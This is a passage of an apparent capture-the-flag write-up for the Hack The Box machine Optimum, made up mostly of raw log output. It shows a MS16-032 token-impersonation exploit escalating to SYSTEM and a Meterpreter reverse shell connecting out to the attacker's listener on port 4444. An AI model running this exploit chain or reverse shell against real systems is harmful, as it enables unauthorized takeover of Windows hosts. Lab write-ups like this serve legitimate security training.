| V | _|_ | | _|___| |_ |_ |
| |_ |_| |_| . |___| | |_ | _|
|_|_|_|___|_____|___| |___|___|___|
[by b33f -> @FuzzySec]
[?] Operating system core count: 2
[>] Duplicating CreateProcessWithLogonW handle
[?] Done, using thread handle: 2544
[*] Sniffing out privileged impersonation token..
[?] Thread belongs to: svchost
[+] Thread suspended
[>] Wiping current impersonation token
[>] Building SYSTEM impersonation token
[ref] cannot be applied to a variable that does not exist.
At line:200 char:3
+ $op4o = [Ntdll]::NtImpersonateThread($kQVm, $kQVm, [ref]$l1Xt)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (l1Xt:VariablePath) [], Runtim
eException
+ FullyQualifiedErrorId : NonExistingVariableReference
[!] NtImpersonateThread failed, exiting..
[+] Thread resumed!
[*] Sniffing out SYSTEM shell..
[>] Duplicating SYSTEM token
Cannot convert argument "ExistingTokenHandle", with value: "", for "DuplicateTo
ken" to type "System.IntPtr": "Cannot convert null to type "System.IntPtr"."
At line:259 char:2
+ $op4o = [Advapi32]::DuplicateToken($iIFah, 2, [ref]$jp5L)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodException
+ FullyQualifiedErrorId : MethodArgumentConversionInvalidCastArgument
[>] Starting token race
[>] Starting process race
[!] Holy handle leak Batman, we have a SYSTEM shell!!
eMoz6z81OVtq3XXeh3tjzhNNnZZyZjZR
[+] Executed on target machine.
[*] Sending stage (176198 bytes) to 10.10.10.8
[*] Meterpreter session 2 opened (10.10.16.3:4444 -> 10.10.10.8:49167) at 2024-03-05 00:21:11 +0900
[+] Deleted C:\Users\kostas\AppData\Local\Temp\GhMiEXc.ps1
meterpreter > shell
Process 1780 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\kostas\Desktop>whoami
whoami
nt authority\system
C:\Users\Administrator\Desktopにroot.txtがある
https://app.hackthebox.com/machines/Optimum